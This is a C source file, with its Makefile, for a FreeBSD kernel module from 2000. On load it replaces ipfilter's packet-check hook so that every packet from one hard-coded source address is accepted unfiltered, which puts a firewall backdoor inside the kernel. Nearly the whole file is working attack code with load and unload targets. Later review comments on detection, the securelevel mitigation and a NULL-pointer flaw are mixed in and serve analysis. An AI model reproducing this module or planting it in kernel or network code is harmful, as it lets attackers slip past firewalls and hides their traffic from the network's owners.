Loadable kernel module (LKM) for FreeBSD that makes ipfilter always accept packets from one hard-coded source IP address.
d411790929f20a121f5c4adfb5b253210f3b91a01fbfc42a70416a71e1ff5ec4
/*
* Name: Filtering IPFiLTER
* Date: Thu May 18 11:00:59 2000
* Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
*
* SoftProject 2000 - Digital Sekurity for Y2k
* Sikurezza.org - Italian Security MailingList
*
* COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
* Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
*
* Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #7: Sun May i386
*
* IPFilter (like ipfw) uses a function pointer in ip_input() and ip_output()
* in order to process packets ...
*
* if(fr_checkp) {
* struct mbuf *m1 = m;
*
* if((*fr_checkp)(ip, hlen, m->m_pkthdr.rcvif, 0, &m1) || !m1)
* return;
* ip = mtod(m=m1, struct ip *);
* }
*
* I give you a Makefile in append so don't write me for that !!! :)
*/
#define GO_JOHNNY_GO "192.168.1.3"
/*
 * Source address that myfr() exempts from filtering: a packet whose IP
 * source field equals this value is accepted without being handed to the
 * saved ipfilter check routine.
 * Review note: the address is a string literal compiled into the module, so
 * it should be recoverable from the built object when triaging a suspect
 * kld file.
 */
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/malloc.h>
#include <sys/mbuf.h>
#include <sys/kernel.h>
#include <sys/proc.h>
#include <sys/socket.h>
#include <sys/socketvar.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_var.h>
/* IPFILTER FreeBSD Options */
typedef struct ip ip_t;
typedef struct mbuf mb_t;
/*
 * Signature shared by the filter check routine and its replacement below.
 * Going by the call quoted in the header comment and the parameter names of
 * myfr(), the arguments are: IP header, header length, interface, direction
 * flag, and a pointer to the mbuf pointer.
 */
typedef int ipfr_t __P((ip_t *, int, void *, int, mb_t **));
/* Prototypes */
static int s_load __P((struct module *, int, void *));
static u_int32_t inaton __P((const char *));
/*
 * Hook pointer owned by the kernel/ipfilter, not by this module; the header
 * comment shows ip_input()/ip_output() calling through it when it is set.
 */
extern ipfr_t *fr_checkp;
/*
 * myfr: the replacement check routine defined in this file.
 * fr:   the hook value that was in fr_checkp when the module was loaded;
 *       restored on unload and called by myfr() for non-exempt packets.
 */
static ipfr_t myfr, *fr;
/*
 * Module event handler.
 *
 * MOD_LOAD:   remember the current fr_checkp in fr, then point fr_checkp at
 *             myfr() so every filtered packet passes through this module.
 * MOD_UNLOAD: put the remembered pointer back.
 * Any other command is ignored.  The handler always returns 0.
 *
 * Both pointer swaps run between splnet() and splx() so the hook is not
 * changed while network processing is using it.
 *
 * Review notes (defensive reading):
 *  - fr_checkp is not tested for NULL at load time.  If no filter routine is
 *    installed, fr stays NULL and myfr() would call through it for every
 *    non-exempt packet.
 *  - On unload the saved value is written back unconditionally, even if
 *    fr_checkp was changed by someone else in the meantime.
 *  - Detection: compare where fr_checkp points with the address range of the
 *    real filter code; a pointer into an unrelated kld is the tell-tale.
 *  - Mitigation: this only works if the attacker can load kernel modules;
 *    FreeBSD's securelevel mechanism is documented to block kldload when
 *    raised -- confirm for the release in use.
 */
static int
s_load(struct module *module, int cmd, void *arg)
{
	int ipl;

	if (cmd == MOD_LOAD) {
		ipl = splnet();
		fr = fr_checkp;		/* keep the original hook */
		fr_checkp = myfr;	/* interpose our routine */
		splx(ipl);
	} else if (cmd == MOD_UNLOAD) {
		ipl = splnet();
		fr_checkp = fr;		/* hand the hook back */
		splx(ipl);
	}

	return 0;
}
/*
 * Module description handed to the kernel: the registered module name, the
 * event handler (s_load) and an extra argument, which is unused here (0).
 * Review note: nothing in this listing conceals the module, so the name
 * "ipfil_mod" and the file name chosen by the accompanying Makefile
 * (KMOD = ipfhack) should remain visible to module-listing tools such as
 * kldstat(8) -- verify on the release under investigation.
 */
static moduledata_t s_mod_1 = {
"ipfil_mod",
s_load,
0
};
/* Register the module with the kernel's module framework. */
DECLARE_MODULE(ipfil_mod, s_mod_1, SI_SUB_PSEUDO, SI_ORDER_ANY);
/*
 * Replacement for the filter check routine installed by s_load().
 *
 * Returns 0 without consulting the real filter when the packet's source
 * address equals GO_JOHNNY_GO; every other packet is passed unchanged to the
 * saved routine in fr and that routine's verdict is returned.  Per the
 * ip_input() excerpt in the header comment, a zero return lets the packet
 * continue through the stack, so the exempt address is never filtered.
 *
 * Review notes (defensive reading):
 *  - The decision looks only at ip_src; hlen, ifp, out and mp are not
 *    examined, so the exemption applies on whichever path calls the hook.
 *  - Exempt packets never reach the saved filter routine, so whatever
 *    accounting or logging that routine performs is skipped for them.
 *  - inaton() re-parses the constant for every packet.
 */
static int
myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp)
{
	const u_int32_t exempt = inaton(GO_JOHNNY_GO);

	if (ip->ip_src.s_addr != exempt)
		return (fr(ip, hlen, ifp, out, mp));

	return 0;
}
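/*
 * Convert a dotted-decimal IPv4 string to a 32-bit address in network byte
 * order.
 *
 * Up to four components separated by '.' are read; a component that is
 * missing or empty counts as zero and anything after the fourth component is
 * ignored (both as in the original implementation).
 *
 * Unlike the original, input is validated: a character that is not a decimal
 * digit, or a component larger than 255, makes the function return
 * 0xffffffff instead of a silently corrupted address.  Without this a typo
 * in the constant would turn into an arbitrary address being compared
 * against packet sources.  The sentinel is the same value as the limited
 * broadcast address 255.255.255.255, so that one input cannot be told apart
 * from an error.
 *
 * str: NUL-terminated string; must not be NULL.
 */
static u_int32_t
inaton(const char *str)
{
	unsigned long addr = 0;
	int i;

	for (i = 0; i < 4; i++) {
		unsigned int octet = 0;

		addr <<= 8;
		if (*str == '\0')
			continue;	/* missing component counts as zero */

		while (*str != '\0' && *str != '.') {
			if (*str < '0' || *str > '9')
				return (htonl(0xffffffffUL));
			octet = octet * 10 + (unsigned int)(*str - '0');
			/* Checked per digit, so octet can never overflow. */
			if (octet > 255)
				return (htonl(0xffffffffUL));
			str++;
		}
		addr |= octet;

		/* The loop stopped on '.' or NUL; step over a separator. */
		if (*str == '.')
			str++;
	}

	return (htonl(addr));
}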
/*
# SoftProject 2000 - Digital Sekurity for Y2k
# Sikurezza.org - Italian Security MailingList
#
# COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
# Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
#
# Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #3: Thu Mar i386
# < pigpen@s0ftpj.org >
.PATH: /sys/kern
SRCS = ipfhack.c
CFLAGS+= -I/sys
KMOD = ipfhack
NOMAN = t
KLDMOD = t
KLDLOAD = /sbin/kldload
KLDUNLOAD = /sbin/kldunload
CLEANFILES+= ${KMOD}
load:
${KLDLOAD} -v ./${KMOD}
unload:
${KLDUNLOAD} -v -n ${KMOD}
.include <bsd.kmod.mk>
*/